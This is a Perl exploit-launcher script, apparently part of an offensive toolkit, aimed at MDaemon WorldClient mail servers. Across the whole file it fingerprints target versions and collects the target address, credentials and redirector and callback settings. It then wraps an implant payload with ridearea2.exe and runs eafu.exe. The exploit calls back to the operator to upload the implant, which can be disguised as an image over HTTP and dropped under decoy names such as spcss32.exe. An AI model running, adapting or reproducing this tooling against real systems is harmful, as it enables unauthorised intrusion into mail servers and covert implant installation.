use strict; use vars qw($VERSION); $::VERSION = "EASYFUN Script:"; print "\n\n$::VERSION\n\n"; use FindBin; use lib "$FindBin::Bin"; use Getopt::Long; use Cwd; use IO::Socket; use Socket; use lib "$FindBin::Bin\\..\\..\\Resources\\Perl"; use ExploitUtils qw( $EU_LOGFILE $EU_VERBOSE $EU_BATCHMODE EU_LogInit EU_Log EU_ExitMessage EU_GetInput EU_GetExistingDir EU_GetIP EU_GetLocalIP EU_GetRootDir EU_GetPort EU_RunCommand EU_GetAddr EU_StopServices ); use vars qw($RIDEAREA $PAYLOAD_DLL $PAYLOAD_EXE $EXPLOIT_EXE @DEPFILES); my @knownWCVersions = ( {string => "No version", num => 0} ); my @knownIISVersions = ( {string => "No version", num => 0} ); my %opts = (); GetOptions(\%opts, "v", "h", "q|?", "b", "e=s", "f=s", "d=s", "t=s", "l=s", "c=s", "x=s") or &print_script_usage(0); if (scalar(@ARGV) > 0 ) { &EU_Log(1, "Extraneous arguments found on command line: @ARGV"); &EU_Log(1, "Arguments will be ingnored"); while(@ARGV) {shift;} } if (!defined($opts{"e"})) { &EU_Log(1, "A -e option must be supplied."); &print_usage(0); } if (!defined($opts{"f"})) { &EU_Log(1, "A -f option must be supplied."); &print_usage(0); } if (!defined($opts{"x"})) { &EU_Log(1, "A -x option must be supplied."); &print_usage(0); } if (!defined($opts{"l"})) { &EU_Log(1, "A -l option must be supplied."); &print_usage(0); } $::RIDEAREA = "Resources\\Tools\\ridearea2.exe"; $::LP_DLL = "$opts{l}"; $::PAYLOAD_DLL = "$opts{f}"; $::PAYLOAD_EXE = "$opts{x}"; $::EXPLOIT_EXE = "$opts{e}\\eafu.exe"; $::CALLBACK_NONE = "0"; $::CALLBACK_NEW = "1"; $::CALLBACK_REUSE_UPLOAD = "2"; $::CALLBACK_REUSE_ENTIRE = "3"; my $work_dir = $opts{"d"} if (defined $opts{"d"}); my $root_dir = $opts{"c"} if (defined $opts{"c"}); my $TargetIp = $opts{"t"} if (defined $opts{"t"}); @DEPFILES = ($::RIDEAREA, $::EXPLOIT_EXE); my $logfile_prefix = "EAFU_"; my $logfile_suffix = "_script.log"; my $filename_suffix = "_payload.bin"; my $SocketIp = $TargetIp; my $SocketPort = 0; my $CallbackOption = 0; my $CallbackIp = 0; my $CallbackPort = 0; my $TimeOutValue = 0; my $PayloadFile = ""; my $PayloadType = ""; my $LocalIp = 0; my $UserName = ""; my $Password = ""; my $TargetPort = 0; my $TargetWCVersion = 0; my $TargetIISVersion = 0; my $TargetBeta = ""; my $TargetLanguage = ""; my $DropFileName = ""; my $Target9x = ""; my $TargetHttps = ""; my $exploit_dir = "$opts{e}"; my $fhttp = 0; my $callbackUrl = ""; my $WCVersionStr; my $versionsFilename = "targetversions.cfg"; my $ImplantPayload = ""; &print_usage(1) if (defined $opts{"h"}); &print_usage(0) if (defined $opts{"q"}); $ExploitUtils::EU_VERBOSE = 1 if (defined $opts{"v"}); $ExploitUtils::EU_BATCHMODE = 1 if (defined $opts{"b"}); if ($ENV{"OS"} ne "Windows_NT") { &EU_ExitMessage(1,"This script requires Windows NT-based platform."); } $work_dir = &EU_GetExistingDir("Enter pathname for operation's working directory", $work_dir, 1); $root_dir = &EU_GetRootDir($root_dir,@::DEPFILES); &EU_LogInit($logfile_prefix, $logfile_suffix, $work_dir); &EU_Log(0,"$::VERSION"); &EU_Log(0,"\nChanging to working directory: $work_dir"); chdir $work_dir || &EU_ExitMessage(1,"Unable to change to working directory: $work_dir"); ($SocketIp, $SocketPort, $CallbackOption, $PayloadFile, $PayloadType, $TimeOutValue, $CallbackIp, $CallbackPort, $UserName, $Password, $TargetPort, $TargetHttps, $TargetWCVersion, $TargetIISVersion, $TargetBeta, $TargetLanguage, $DropFileName, $Target9x, $fhttp, $callbackUrl) = &validate_parms($work_dir, $root_dir, $SocketIp, $SocketPort, $CallbackOption, $PayloadFile, $PayloadType, $TimeOutValue, $CallbackIp, $CallbackPort); &EU_ExitMessage(0,"\nUser terminated script") if ($TargetWCVersion == 0 ); my $answer; if(!$EU_BATCHMODE) { $answer = &EU_GetInput("\nReady to begin exploit ([y],n,quit)? ", "y"); &EU_ExitMessage(0,"User terminated script") if ($answer ne "y" and $answer ne "Y"); } my $payload_name_format = "${work_dir}\\${logfile_prefix}%04d%02d%02d_%02d%02d%02d${filename_suffix}"; my ($sec, $min, $hour, $mday, $mon, $year, $wday, $yday, $isdst) = gmtime(time); $year += 1900; $mon += 1; my $RA_Payload = sprintf($payload_name_format,$year,$mon,$mday,$hour,$min,$sec); my $CommandString = ""; if ($Target9x eq "n") { $CommandString = "\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -o \"$RA_Payload\" -t m -l m"; if( $CallbackOption eq $::CALLBACK_NONE ) { $CommandString = $CommandString . " -f 13 -a 3"; } elsif( $CallbackOption eq $::CALLBACK_NEW ) { $CommandString = $CommandString . " -f 17 -a 8"; } if ( $PayloadType eq "e") { $CommandString = $CommandString . " -d $DropFileName"; } &EU_RunCommand($CommandString); } else { &EU_Log(1, "\nTarget is Windows 9x. Building the 'drop executable' payload."); if ($PayloadType eq "e") { &EU_RunCommand("\"$root_dir\\$exploit_dir\\9xPayload.exe\" -i \"$PayloadFile\" -o \"$RA_Payload\""); } else { &EU_ExitMessage(0, "Can't run the ExpandingPulley DLL on a 9x target.\n"); } } my $flags = ""; #my $flags; #if($ExploitUtils::EU_VERBOSE) { $flags = "-v"; } #else { $flags = ""; } if ($fhttp == 1) { &EU_StopServices("W3SVC"); $flags = "-h \"$callbackUrl\""; } my $ImplantPayload = $RA_Payload ; my ($tsec, $tmin, $thour, $tdate, $tmonth, $tyear, $twday, $tyday, $tisdst) = localtime (time); $tyear += 1900; $tmonth += 1; my $logfileformat = "$work_dir\\$logfile_prefix%04d%02d%02d_%02d%02d%02d_exe.log"; my $log_filename = sprintf ($logfileformat, $tyear, $tmonth, $tdate, $thour, $tmin, $tsec); $CommandString = "start \"EF Exploit\" cmd /T:9F /K \"\"$root_dir\\$::EXPLOIT_EXE\"" . " -i $SocketIp" . " -p $SocketPort" . " -c $CallbackOption" . " -I $CallbackIp" . " -P $CallbackPort" . " -f \"$ImplantPayload\"" . " -l \"$root_dir\\$::LP_DLL\"" . " -o $TimeOutValue -u $UserName" . " -w $Password" . " -t $TargetIp" . " -r $TargetPort" . " -v $TargetWCVersion" . " -s $TargetIISVersion" . " -a $TargetLanguage" . " -9 $Target9x $flags" . " -m $TargetHttps" . " -L \"$log_filename\"" . " -V \"$versionsFilename\""; if ($TargetBeta ne "") { $CommandString = $CommandString . " -b $TargetBeta"; } &EU_Log(1,"\nUsing command line string \n***********\n$CommandString\n***********\n"); &EU_Log(1,"\nExploit will launch in a separate window. Follow the status messages"); &EU_Log(1,"in the new window to determine if it succeeds."); &EU_Log(1,"\nLaunching exploit..."); &EU_RunCommand($CommandString); my $cur_dir = cwd(); chdir $cur_dir || &EU_ExitMessage(1,"Unable to switch back to initial directory: $cur_dir"); &EU_ExitMessage(0,"\nDone with $::0."); sub print_usage() { my ($verbose) = @_; print "$::VERSION\n"; print qq~ Usage: $::0 [-v] [-h] [-?] [-b] [-d ] [-e ] [-t ] [-f ] [-l ] ~; if ($verbose) { print qq~ -v verbose mode. Default non-verbose mode. -h Print this help information. -? Print abbreviated help information. -b Batch (non-interactive) mode. Default interactive mode. -d Working Directory Top-level directory where operation's files will be generated. Default E:\. -e Exploits Directory Top-level directory containing exploit files. Default one directory up from directory containing this script. -t Target IP address. Default derived as last part of working directory name. -f Filename of the implant payload. -x Filename of the implant payload exe. -l Filename of the listening post dll. ~; } &EU_ExitMessage(1,"End of help."); } sub validate_parms() { my ($work_dir, $root_dir, $SocketIp, $SocketPort, $CallbackOption, $PayloadFile, $PayloadType, $TimeOutValue, $CallbackIp, $CallbackPort) = @_; my ($continue, $retcode, $IISretcode, $vol, $dir); my ($redirectFlag, $LocalIp); my ($UserName, $Password, $TargetPort, $TargetWCVersion, $TargetIISVersion, $TargetBeta, $TargetLanguage); my $DropFileName = "spcss32.exe"; my $Target9x = "n"; my $TargetIIS = "n"; my $TargetHttps = "n"; my $en = 0; my $es = 0; my $fr = 0; my $ge = 0; my $jp = 0; my $it = 0; my $pt = 0; my $ru = 0; my $ch = 0; my $ar = 0; my $i = 0; my $fhttp = 0; my $callbackUrl = ""; my $v_index; $LocalIp = &EU_GetLocalIP("Enter the local IP Address", $LocalIp); &EU_Log(0, "Enter the local IP Address: $LocalIp"); while (1) { &EU_Log(1,"\nSelect Payload file to send:\n"); &EU_Log(1," 0) $::PAYLOAD_DLL"); &EU_Log(1," 1) $::PAYLOAD_EXE"); &EU_Log(1," 2) Arbitrary Executable"); while(1) { $retcode = &EU_GetInput("\nEnter selection [0]: ", "0"); &EU_Log(0, "\nEnter selection [0]: $retcode"); if($retcode eq "0") { &EU_Log(1,"\nUsing Payload file $::PAYLOAD_DLL\n"); $PayloadFile = $::PAYLOAD_DLL; $PayloadType = "d"; &EU_Log(1, "\nWill use a new socket to callback and do everything else.\n"); $CallbackOption = $::CALLBACK_NEW; } elsif($retcode eq "1") { &EU_Log(1,"\nUsing Payload file $::PAYLOAD_EXE\n"); $PayloadFile = $::PAYLOAD_EXE; $PayloadType = "e"; &EU_Log(1, "\nWill use a new socket to callback and upload the implant only.\nThe exploit will not automatically launch its own listening post.\n"); $CallbackOption = $::CALLBACK_REUSE_UPLOAD; } elsif($retcode eq "2") { $PayloadFile = &EU_GetInput("Enter the full pathname of the executable you wish to run on the target: "); $DropFileName = &EU_GetInput("Enter the filename as it should appear on the target [msregstr.exe]: ", "msregist.exe"); $PayloadType = "e"; for ( $CallbackOption=0; $CallbackOption < 1 or $CallbackOption > 3; ) { &EU_Log(1, "\nSelect callback option:" . "\n\t$::CALLBACK_NEW) Create a new socket for the callback and everything else that happens thereafter." . "\n\t$::CALLBACK_REUSE_UPLOAD) Reuse the same exploit socket in order to upload the implant only (recommended for exe payload)." . "\n\t$::CALLBACK_REUSE_ENTIRE) Reuse the same exploit socket for the entirety of the operation.\n" ); $CallbackOption = &EU_GetInput("\nEnter selection for callback option[$::CALLBACK_REUSE_UPLOAD]: ", "$::CALLBACK_REUSE_UPLOAD"); } &EU_Log(1, "\nWill use a new socket to callback and do everything else.\n"); } else { &EU_Log(1, "Invalid option. Try again or enter 'quit'."); next; } last; } $retcode = &EU_GetInput("\nWill this operation be REDIRECTED (y,[n])? ", "n"); if( ($retcode eq "y") or ($retcode eq "yes") or ($retcode eq "Y") or ($retcode eq "YES") ) { $redirectFlag = 1; } else { $redirectFlag = 0; } if( $redirectFlag == 0 ) { $SocketPort = 3000; $SocketIp = &EU_GetIP("\nEnter the target IP Address", $SocketIp); &EU_Log(0, "Enter the target IP Address: $SocketIp"); $SocketPort = &EU_GetPort("\nEnter the target Port", $SocketPort); &EU_Log(0, "Enter the target Port: $SocketPort"); &EU_Log(1, "\nThe EF Exploit Payload must callback in order to upload the Implant Payload."); &EU_Log(1, "The local IP Address should be used as the callback IP Address."); $TargetPort = $SocketPort; } else { $SocketIp = &EU_GetIP("\nEnter the redirection IP Address", ""); &EU_Log(0, "\nEnter the redirection IP Address: $SocketIp"); $SocketPort = &EU_GetPort("Enter the redirection Port"); &EU_Log(0,"Enter the redirection Port: $SocketPort"); $TargetPort = &EU_GetPort("Enter the TARGET port"); &EU_Log(0, "Enter the port the target is listening on"); &EU_Log(1, "\nThe EF Exploit Payload must callback in order to"); &EU_Log(1, "upload the Implant Payload. The callback IP Address MUST be that of"); &EU_Log(1, "the Redirector. The callback Port MUST be the same number on both"); &EU_Log(1, "the Redirector and the local machine, else redirection will fail."); &EU_Log(1, "The local machine uses this port to listen for the callback, and the"); &EU_Log(1, "EF Exploit Payload uses it to call back to the Redirector."); &EU_Log(1, "\nThe redirection IP Address should be used as the callback IP Address."); } $TargetHttps = &EU_GetInput("\nIs the target using a secure connection? (y, [n]) ", "n"); if( ($TargetHttps eq "y") or ($TargetHttps eq "yes") or ($TargetHttps eq "Y") or ($TargetHttps eq "YES") ) { $TargetHttps = "y"; } $CallbackIp = &EU_GetLocalIP("\nEnter the callback IP Address", $LocalIp); &EU_Log(0, "Enter the callback IP Address: $CallbackIp"); for ( $CallbackPort = -1; $CallbackPort < 1 or $CallbackPort > 65535; ) { $CallbackPort = &EU_GetPort("\nEnter the callback Port. (Use 0 to generate a random port between 1 and 65535 -- not recommended).", 0); if (0 == $CallbackPort) { $CallbackPort = int rand (65534); $CallbackPort += 1; } } &EU_Log (1, "\nUsing callback port $CallbackPort\n"); &EU_Log(1, "\nThe default time-out value for the target connection is 60 sec."); &EU_Log(1, "(You may want to increase this value if the network is exceptionally slow.)"); $retcode = &EU_GetInput("Use default value of 60 sec ([y],n)? ", "y"); &EU_Log(0, "Use default value of 60 sec ([y],n)? $retcode"); if( ($retcode eq "y") or ($retcode eq "yes") or ($retcode eq "Y") or ($retcode eq "YES") or ($retcode eq "60") ) { $TimeOutValue = "60"; } else { $TimeOutValue = &EU_GetInput("Enter new time-out value (greater than 60): "); &EU_Log(0, "Enter new time-out value (greater than 60): $TimeOutValue"); } &EU_Log(1, "\nYou can send the implant by having the target make an HTTP request to the callback IP address. Your machine will reply by uploading the implant wrapped inside well-formed HTML that will claim that the implant is actually an image.\n"); &EU_Log(1, "If you do not use HTTP tunneling then the target will callback with a 4-byte authentication code to which your machine will reply by uploading the implant.\n"); &EU_Log(1, "Using HTTP tunneling will cause the socket to be closed after the implant has been uploaded, so you will need to start your own listening post.\n"); $retcode = &EU_GetInput("\nUse HTTP tunneling for the callback connection? (y,[n])? ", "n"); &EU_Log(0, "Use HTTP tunneling for the callback connection? (y,[n])? $retcode"); if( ($retcode eq "y") or ($retcode eq "yes") or ($retcode eq "Y") or ($retcode eq "YES") ){ $fhttp = 1; } if ($fhttp) { $callbackUrl = "http://$CallbackIp"; if ($CallbackPort == 80 or $CallbackPort eq "80") { $callbackUrl .= "/"; } else { $callbackUrl .= ":$CallbackPort/"; } &EU_Log(1, "Based on the parameters, I think the callback URL should be:\n$callbackUrl"); $retcode = &EU_GetInput("Is this correct? ([y], n)", "y"); if( ($retcode eq "n") or ($retcode eq "no") or ($retcode eq "N") or ($retcode eq "NO") ){ $callbackUrl = &EU_GetInput("Enter the callback URL: ", ""); } } $TargetWCVersion = 0; $TargetIISVersion = 0; $TargetBeta = ""; $TargetLanguage = "en"; my $needLang = 0; &EU_Log(1, "\n\nNow we will determine the version of WorldClient that will be exploited.\n"); while(1) { while (1) { my (@linesFromVfile, $wcv, @WCversions, @IISversions); my $numVersions = 0; $versionsFilename = &EU_GetInput("\nEnter the filename of the list of WorldClient versions ([$versionsFilename])", $versionsFilename); $versionsFilename = "$root_dir\\$opts{e}\\$versionsFilename" ; open (VERSIONS, $versionsFilename) or die ("\nFailed to open file <$versionsFilename>.\n") ; &EU_Log (1, "\nUsing file <$versionsFilename> to get a list of supported WorldClient versions.\n"); @linesFromVfile = ; close (VERSIONS); @WCversions = grep (/^Version \d\d?\.\d\.\d/, @linesFromVfile); for ($v_index = 0; $v_index < @WCversions; $v_index+=1) { $WCversions[$v_index] =~ /(\d\d?)\.(\d)\.(\d)/; $knownWCVersions[$v_index+1]->{string} = "$1.$2.$3"; $knownWCVersions[$v_index+1]->{num} = "$1$2$3" + 0; } @IISversions = grep (/^IIS \d\d?\.\d/, @linesFromVfile); for ($v_index = 0; $v_index < @IISversions; $v_index+=1) { $IISversions[$v_index] =~ /(\d\d?)\.(\d)/; $knownIISVersions[$v_index+1]->{string} = "$1.$2"; $knownIISVersions[$v_index+1]->{num} = "$1$2" + 0; } if (@WCversions > 0) {last;} } while( 1 ) { $retcode = &Yes_No("\nWould you like to probe the target for its WorldClient version ([y],n)? ","y"); if ( $retcode eq "y") { ($TargetWCVersion, $WCVersionStr, $TargetIISVersion) = &Probe_WorldClient( $SocketIp, $SocketPort, $TargetHttps ); if ( $TargetWCVersion eq -1 ) { $TargetWCVersion = 0; &EU_Log(1, "\nThe touch tool has detected that $WCVersionStr"); $retcode = &Yes_No("\nWould you like to probe again (y,[n])? ","n"); if ( $retcode eq "y" ) { next; } else { $retcode = &Yes_No("\nWould you like terminate this script (y,[n])? ","n"); if ( $retcode eq "n" ) { last; } else { return; } } } elsif ( $TargetWCVersion eq 0 ) { &EU_Log(1, "\nThe touch tool has detected that $WCVersionStr"); last; } else { &EU_Log(1, "\nThe touch tool has detected that $WCVersionStr is running on the target."); $retcode = &Yes_No("\nAre you happy with this result ([y],n) ? ","y"); if( $retcode eq "y" ) { last; } else { $TargetWCVersion = 0; } } } last; } if ( $TargetWCVersion eq 0 ) { while( 1 ) { &EU_Log(1, "\nYou are about to be asked for the target MDaemon version."); &EU_Log(1, "If you are unsure about these values, you should banner MDaemon"); &EU_Log(1, "25, 110, 143, WorldClient - 3000 (by default). "); &EU_Log(1, "In general the WorldClient version is the same as the MDaemon version."); &EU_Log(1, "* Currently only v3.0.4 is the exception which has a WC v3.0.2.*"); &EU_Log(1, "\n\tMDaemon Version"); &EU_Log(1, "\t---------"); my $vmax = @knownWCVersions; for ($v_index=1; $v_index < $vmax; $v_index++) {&EU_Log(1, "\t $v_index) ".$knownWCVersions[$v_index]->{string}); } $retcode = &EU_GetInput("\nSelect a target version [0]: ", 0 ); &EU_Log(0, "Select a target version [0]: $retcode"); if ( $retcode <= 0 or $retcode >= @knownWCVersions ) { &EU_Log(1, "\nInvalid option. Try again *.\n"); next } last; } $TargetIIS = &EU_GetInput("\nIs the target machine configured to use WorldClient via IIS? (y, [n]) ", "n"); if ( $TargetIIS eq 'y' ) { while ( 1 ) { &EU_Log(1, "\nPlease select the version of IIS used by the target:"); &EU_Log(1, "\n\tIIS Version"); &EU_Log(1, "\t-----------"); &EU_Log(1, "\t 0) IIS Not Used"); &EU_Log(1, "\t 3) IIS 6.0"); $IISretcode = &EU_GetInput("\nSelect an IIS Version [0]: ", "0"); if ( $IISretcode < 0 or $IISretcode > 4 ) { &EU_Log(1, "\nInvalid option. Try again.\n"); next } last; }; if ( $IISretcode == 0 ) { $TargetIISVersion = 0; } elsif ( $IISretcode != 3 ) { &EU_Log(1, "\nOnly IIS 6.0 is currently supported!.\n"); return; } else { $TargetIISVersion = 60; } } } for ($v_index=1; $v_index<@knownWCVersions; $v_index++) { if( $retcode == $v_index or $TargetWCVersion == $knownWCVersions[$v_index]->{num} ) { $TargetWCVersion = $knownWCVersions[$v_index]->{num}; last; } } if ($v_index >= @knownWCVersions) { &EU_Log(1, "\nInvalid option. Try again +.\n"); next } last; } if ($TargetIISVersion) { $needLang = 1; $en = 1; $ch = 1; $ar = 1; } $Target9x = &EU_GetInput("\nIs the target machine Windows 95, 98, or ME? (y, [n]) ", "n"); if ( $Target9x eq 'y' ) { if ( $TargetWCVersion eq 684 ) { $needLang = 1; $ru = 0; $jp = 0; $ge = 0; $fr = 0; } } &EU_Log(1, ""); if ($needLang) { &EU_Log(1, "\nYou are about to be asked for the target MDaemon language."); &EU_Log(1, "If you are unsure about these values, you should banner MDaemon"); &EU_Log(1, "25, 110, 143, WorldClient - 3000."); &EU_Log(1, "E.g. 'ready' = English, 'listo' = Spanish.\n"); while(1) { if ($en) { &EU_Log(1, "\t1) English"); } if ($es) { &EU_Log(1, "\t2) Spanish"); } if ($ge) { &EU_Log(1, "\t3) German"); } if ($fr) { &EU_Log(1, "\t4) French"); } if ($jp) { &EU_Log(1, "\t5) Japanese"); } if ($ru) { &EU_Log(1, "\t6) Russian"); } if ($pt) { &EU_Log(1, "\t7) Polish"); } if ($it) { &EU_Log(1, "\t8) Italian"); } if ($ch) { &EU_Log(1, "\t9) Chinese"); } if ($ar) { &EU_Log(1, "\t10) Arabic"); } $retcode = &EU_GetInput("\nSelect a target language [1]: ", 1); if( ( $retcode < 1 ) or ( $retcode > 10 ) ) { &EU_Log(1, "\nInvalid option. Try again.\n"); next } else { if( $retcode == 1 ) { $TargetLanguage = "en"; } elsif( $retcode == 2 ) { $TargetLanguage = "es"; } elsif( $retcode == 3 ) { $TargetLanguage = "ge"; } elsif( $retcode == 4 ) { $TargetLanguage = "fr"; } elsif( $retcode == 5 ) { $TargetLanguage = "jp"; } elsif( $retcode == 6 ) { $TargetLanguage = "ru"; } elsif( $retcode == 7 ) { $TargetLanguage = "pl"; } elsif( $retcode == 8 ) { $TargetLanguage = "it"; } elsif( $retcode == 9 ) { $TargetLanguage = "ch"; } elsif( $retcode == 10 ) { $TargetLanguage = "ar"; } } last } } &EU_Log(1, "\nValid MDaemon usernames are email addresses, e.g. user\"); $UserName = &EU_GetInput("Enter a valid username: "); $Password = &EU_GetInput("\nEnter the password for $UserName: "); &EU_Log(1,"\nConfirm Network Parameters:"); &EU_Log(1,"\tRoot Directory : $root_dir"); &EU_Log(1,"\tLocal IP : $LocalIp"); &EU_Log(1,"\tTarget WC Version : $TargetWCVersion$TargetBeta"); if ($TargetIISVersion > 0) { &EU_Log(1,"\tTarget IIS Version : $TargetIISVersion"); } &EU_Log(1,"\tTarget Language : $TargetLanguage"); &EU_Log(1,"\tUserName : $UserName"); &EU_Log(1,"\tPassword : $Password"); &EU_Log(1,"\tTarget is Win 9x : $Target9x"); if( $redirectFlag ) { &EU_Log(1,"\tUsing Redirection : True"); &EU_Log(1,"\tRedirector IP : $SocketIp"); &EU_Log(1,"\tRedirector Port : $SocketPort"); &EU_Log(1,"\tTarget Port : $TargetPort"); } else { &EU_Log(1,"\tUsing Redirection : False"); &EU_Log(1,"\tTarget IP : $SocketIp"); &EU_Log(1,"\tTarget Port : $SocketPort"); } &EU_Log(1,"\tCallback IP : $CallbackIp"); &EU_Log(1,"\tCallback Port : $CallbackPort"); &EU_Log(1,"\tUsing HTTP Tunneling: $fhttp"); &EU_Log(1,"\tCallback URL : $callbackUrl"); &EU_Log(1,"\tNetwork Time Out : $TimeOutValue sec"); $continue = &EU_GetInput("\nContinue with the current values ([y],n,quit)? ","y"); &EU_Log(0, "\nContinue with the current values ([y],n,quit)? $continue"); if( ($continue eq "y") or ($continue eq "yes") or ($continue eq "Y") or ($continue eq "YES") ) { last; } elsif( ($continue eq "q") or ($continue eq "quit") or ($continue eq "Q") or ($continue eq "QUIT") ) { &EU_ExitMessage(1,"User terminated script\n"); } else { &EU_Log(1, "Returning to top of script...\n"); next; } } return ($SocketIp, $SocketPort, $CallbackOption, $PayloadFile, $PayloadType, $TimeOutValue, $CallbackIp, $CallbackPort, $UserName, $Password, $TargetPort, $TargetHttps, $TargetWCVersion, $TargetIISVersion, $TargetBeta, $TargetLanguage, $DropFileName, $Target9x, $fhttp, $callbackUrl); } sub Probe_WorldClient() { my ( $TargetIP, $TargetPort, $TargetHttps) = @_; my $HTTPRequest = "GET / HTTP/1.1\r\nHost:\r\n\r\n"; my $HTTPResponse; my $ResponseHeader; my $WCVer = 0; my $IISVer = 0; my $WCStr = ""; my $socket = -1; my $touchedWCversion = ""; my $touchedIISversion = ""; my $v_index; &EU_Log(1, "\n\n*************** WorldClient Touch Tool ***************\n\n" ); if($TargetHttps eq "y") { my @eafu_ssl_args = "$TargetIP $TargetPort"; $WCVer = &EU_RunCommand("\"$root_dir\\$opts{e}\\EAFU_SSL_exe\\EAFU_SSL.exe\" @eafu_ssl_args\""); while(!$touchedWCversion) { $touchedWCversion = &EU_GetInput("\nRE-ENTER the WorldClient versions number seen above: ", $touchedWCversion); } $touchedIISversion = &EU_GetInput("\nIf WorldClient was found to be running through IIS\nRE-ENTER the IIS versions number seen above\nIf not hit enter: ", $touchedIISversion); if( $touchedWCversion =~ /\d\d?\.\d\.\d/) { for ($v_index=0; $v_index<@knownWCVersions; $v_index++) { if ($touchedWCversion eq $knownWCVersions[$v_index]->{string}) { &EU_Log(1,"\nWorldClient version supported\n" ); $WCVer = $knownWCVersions[$v_index]->{num}; $WCStr = "WorldClient Version ".$knownWCVersions[$v_index]->{string}; last; } } if ($v_index >= @knownWCVersions ) { $WCVer= 0; $WCStr = "WorldClient Version is currently not supported"; } } else { $WCVer= -1; $WCStr= "the WorldClient version was not typed in correctly\n"; } if( $touchedIISversion =~ /\d\d?\.\d/ ) { for ($v_index=0; $v_index<@knownIISVersions; $v_index++) { if ($touchedIISversion eq $knownIISVersions[$v_index]->{string}) { $IISVer = $knownIISVersions[$v_index]->{num}; $WCStr .= " configured with IIS ".$knownIISVersions[$v_index]->{string}; last; } } if ($v_index >= @knownWCVersions ) { $WCVer = 0; $IISVer = 0; $WCStr .= " is configured with an unsupported version of IIS"; } } } else { &EU_Log(1, "Connecting to $TargetIP : $TargetPort\n" ); $socket = &do_connect($TargetIP , $TargetPort, $socket); if ($socket == -1) { $WCVer= -1; $WCStr= "it was unable to connect to $TargetIP:$TargetPort"; } else { &EU_Log(1, "Connected to $TargetIP : $TargetPort\n"); print $socket "$HTTPRequest"; $HTTPResponse = ""; while(<$socket>) { $HTTPResponse .= $_; } $HTTPResponse =~ /HTTP\/1.[0-1].*(\r\n){2}/s; &EU_Log(1, "\n\n$&" ); if ( $HTTPResponse =~ /HTTP\/1\.[0-1] 200 OK/ and $HTTPResponse =~ /Server: WDaemon\/(\d\d?\.\d\.\d)/) { &EU_Log(1, "Found WorldClient version $1\n"); $touchedWCversion = $1; for ($v_index=0; $v_index<@knownWCVersions; $v_index++) { if ($touchedWCversion eq $knownWCVersions[$v_index]->{string}) { &EU_Log(1,"WorldClient version supported\n" ); $WCVer = $knownWCVersions[$v_index]->{num}; $WCStr = "WorldClient Version ".$knownWCVersions[$v_index]->{string}; last; } } if ($v_index >= @knownWCVersions ) { $WCVer= 0; $WCStr = "WorldClient Version is currently not supported"; } &EU_Log(1,"\n\t$WCStr" ); close( $socket ); } elsif ( $HTTPResponse =~ /HTTP\/1\.[0-1] 200 OK/ and $HTTPResponse =~ /Server: Microsoft-IIS\/(\d\d?\.\d).*MDaemon\/WorldClient.*v(\d\d?\.\d\.\d)/s ) { $touchedIISversion = $1; $touchedWCversion = $2; for ($v_index=0; $v_index<@knownWCVersions; $v_index++) { if ($touchedWCversion eq $knownWCVersions[$v_index]->{string}) { $WCVer = $knownWCVersions[$v_index]->{num}; $WCStr = "WorldClient Version ".$knownWCVersions[$v_index]->{string}; last; } } if ($v_index >= @knownWCVersions ) { $WCVer = 0; $WCStr = "WorldClient Version is currently not supported"; } else { for ($v_index=0; $v_index<@knownIISVersions; $v_index++) { if ($touchedIISversion eq $knownIISVersions[$v_index]->{string}) { $IISVer = $knownIISVersions[$v_index]->{num}; $WCStr .= " configured with IIS ".$knownIISVersions[$v_index]->{string}; last; } } if ($v_index >= @knownWCVersions ) { $WCVer = 0; $IISVer = 0; $WCStr .= " is configured with an unsupported version of IIS"; } } &EU_Log(1,"\n\t$WCStr" ); close( $socket ); } else { $WCVer = -1; $WCStr= "a bad response was received from the server\n"; } } } &EU_Log(1,"\n\n*************** WorldClient Touch Tool ***************\n\n" ); return( $WCVer, $WCStr, $IISVer); } sub do_connect { my ($targ_ip, $targ_port, $socket) = @_; while (!($socket = IO::Socket::INET->new(PeerAddr => $targ_ip, PeerPort => $targ_port, Proto => "tcp", Type => SOCK_STREAM, Timeout => 7, ReuseAddr => 1) ) ) { return -1; } return $socket; } sub Yes_No() { my ($Prompt, $Default) = @_; my $Resp = $Default; while(1) { $Resp = &EU_GetInput( "$Prompt","$Default"); &EU_Log(0, "$Prompt $Resp"); if( ($Resp eq "y") or ($Resp eq "yes") or ($Resp eq "Y") or ($Resp eq "YES") ) { $Resp = "y"; last; } elsif( ($Resp eq "n") or ($Resp eq "no") or ($Resp eq "N") or ($Resp eq "NO") ) { $Resp = "n"; last; } else { &EU_Log(1, "$Resp is an Invalid Response...\n"); next; } } return $Resp; } __END__